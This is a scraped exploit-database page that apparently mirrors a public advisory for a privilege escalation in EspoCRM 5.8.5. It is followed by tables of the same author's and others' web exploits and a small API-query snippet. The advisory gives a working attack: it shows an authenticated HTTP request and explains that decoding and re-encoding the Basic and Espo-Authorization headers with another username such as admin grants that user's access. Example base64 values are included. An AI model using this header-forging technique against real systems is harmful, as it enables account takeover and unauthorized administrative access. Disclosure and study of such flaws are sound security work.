Search for hundreds of thousands of exploits

"EspoCRM 5.8.5 - Privilege Escalation"

Author

Exploit author

Besim

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-04-24

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
# Exploit Title: EspoCRM 5.8.5 - Privilege Escalation
# Author: Besim ALTINOK
# Vendor Homepage: https://www.espocrm.com
# Software Link: https://www.espocrm.com/downloads/EspoCRM-5.8.5.zip
# Version: v5.8.5
# Tested on: Xampp
# Credit: İsmail BOZKURT

-------------

Details:
--------------------------------------------

1- When we sent a request to the /api/v1/App/user, we can see user details
---
First Request:
---------------------------
GET /api/v1/App/user HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 *************************
Authorization: Basic *************************************
Espo-Authorization: *************************************
Espo-Authorization-By-Token: true
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Cookie: auth-token-secret=cdc7f7*********************377;
auth-username=user1; auth-token=3a874a********************************48
----

2- When we decode Basic Authorization and Espo-Authorization and change the
value with another username (like admin)  in the first request, we can see
other user information and access like BOSS
----------

3- Some Examples and encode technique

- BASE64:
First type: dXNlcjE6MQ== (user1:1)
Second type: user1:MzNmYzYwZDQ1ZDI2YWNhODYxZTZlYjdiMDgwMjk4TkRn (user1:pass)
Release DateTitleTypePlatformAuthor
2020-07-26"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)"webappsmultiplebdrake
2020-07-26"Socket.io-file 2.0.31 - Arbitrary File Upload"webappsmultipleCr0wTom
2020-07-26"Bludit 3.9.2 - Directory Traversal"webappsmultiple"James Green"
2020-07-26"INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution"webappsmultiple"Patrick Hener"
2020-07-26"Bio Star 2.8.2 - Local File Inclusion"webappsmultiple"SITE Team"
2020-07-22"Sophos VPN Web Panel 2020 - Denial of Service (Poc)"webappsmultiple"Berk KIRAS"
2020-07-22"Docsify.js 4.11.4 - Reflective Cross-Site Scripting"webappsmultiple"Amin Sharifi"
2020-07-14"Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)"webappsmultiple"Mehmet Ince"
2020-07-14"BSA Radar 1.6.7234.24750 - Local File Inclusion"webappsmultiple"William Summerhill"
2020-07-07"BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation"webappsmultiple"William Summerhill"
Release DateTitleTypePlatformAuthor
2020-05-12"qdPM 9.1 - Arbitrary File Upload"webappsphpBesim
2020-05-11"CuteNews 2.1.2 - Arbitrary File Deletion"webappsphpBesim
2020-05-06"Booked Scheduler 2.7.7 - Authenticated Directory Traversal"webappsphpBesim
2020-05-06"webTareas 2.0.p8 - Arbitrary File Deletion"webappsphpBesim
2020-05-06"i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion"webappsphpBesim
2020-05-05"PhreeBooks ERP 5.2.5 - Remote Command Execution"webappsphpBesim
2020-05-05"webERP 4.15.1 - Unauthenticated Backup File Access"webappsphpBesim
2020-04-29"School ERP Pro 1.0 - Arbitrary File Read"webappsphpBesim
2020-04-28"School ERP Pro 1.0 - Remote Code Execution"webappsphpBesim
2020-04-28"School ERP Pro 1.0 - 'es_messagesid' SQL Injection"webappsphpBesim
2020-04-27"Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)"webappsphpBesim
2020-04-27"Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak"webappshardwareBesim
2020-04-27"Netis E1+ 1.2.32533 - Backdoor Account (root)"webappshardwareBesim
2020-04-27"PHP-Fusion 9.03.50 - 'Edit Profile' Arbitrary File Upload"webappsphpBesim
2020-04-24"Edimax EW-7438RPn 1.13 - Remote Code Execution"webappshardwareBesim
2020-04-24"EspoCRM 5.8.5 - Privilege Escalation"webappsmultipleBesim
2020-04-23"User Management System 2.0 - Authentication Bypass"webappsphpBesim
2020-04-23"User Management System 2.0 - Persistent Cross-Site Scripting"webappsphpBesim
2020-04-23"Complaint Management System 4.2 - Persistent Cross-Site Scripting"webappsphpBesim
2020-04-23"Complaint Management System 4.2 - Authentication Bypass"webappsphpBesim
2020-04-23"Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)"webappsphpBesim
2020-04-22"Edimax EW-7438RPn - Information Disclosure (WiFi Password)"webappshardwareBesim
2020-04-22"Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering)"webappshardwareBesim
2016-10-31"S9Y Serendipity 2.0.4 - Cross-Site Scripting"webappsphpBesim
2016-10-23"Zenbership 107 - Multiple Vulnerabilities"webappsphpBesim
2016-10-19"CNDSOFT 2.3 - Cross-Site Request Forgery / Arbitrary File Upload"webappsphpBesim
2016-10-13"Colorful Blog - Persistent Cross-Site Scripting"webappsphpBesim
2016-10-13"Thatware 0.4.6 - SQL Injection"webappsphpBesim
2016-10-13"Colorful Blog - Cross-Site Request Forgery (Change Admin Password)"webappsphpBesim
2016-10-13"JonhCMS 4.5.1 - SQL Injection"webappsphpBesim
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48376/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.